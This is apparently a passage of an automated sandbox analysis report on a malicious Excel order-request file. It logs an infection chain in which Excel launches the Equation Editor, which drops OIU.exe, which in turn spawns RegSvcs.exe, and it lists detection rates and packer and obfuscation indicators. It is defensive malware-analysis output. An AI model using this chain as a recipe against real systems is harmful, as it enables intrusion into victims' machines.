                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Order Request1_5_24.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR785A.tmpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Order Request1_5_24.xlam.xlsxVirustotal: Detection: 52%
                  Source: Order Request1_5_24.xlam.xlsxReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\OIU.exe C:\Users\user\AppData\Roaming\OIU.exe
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\OIU.exe
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\OIU.exe C:\Users\user\AppData\Roaming\OIU.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\OIU.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: Order Request1_5_24.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.jpg
                  Source: Order Request1_5_24.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: _.pdb source: RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: OIU.exe, 00000003.00000003.457625635.0000000002B10000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000003.00000003.457568121.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000005.00000003.460414972.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000005.00000003.460320894.0000000002990000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000007.00000003.462048122.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000007.00000003.462023023.0000000002950000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000009.00000003.463861681.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 00000009.00000003.463799420.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 0000000B.00000003.465588880.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, OIU.exe, 0000000B.00000003.465720630.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
                  Source: Order Request1_5_24.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00BA42DE
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC0A76 push ecx; ret 3_2_00BC0A89
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C35959 push ebp; ret 3_2_00C3595F
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C35968 push edi; ret 3_2_00C3596B
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C3596C push ebp; ret 3_2_00C3596F
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C35971 push esi; ret 3_2_00C35973
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C35975 push edi; ret 3_2_00C35977
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C35978 push ebp; ret 3_2_00C3597B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041C40C push cs; iretd 12_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00423149 push eax; ret 12_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041C50E push cs; iretd 12_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004231C8 push eax; ret 12_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040E21D push ecx; ret 12_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041C6BE push ebx; ret 12_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_002E475C push ebx; retf 12_2_002E4762
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Q7YThFiogb6dB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Q7YThFiogb6dB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Q7YThFiogb6dB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Q7YThFiogb6dB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Q7YThFiogb6dB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\OIU.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BBF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00BBF98E
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_00C31C41
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
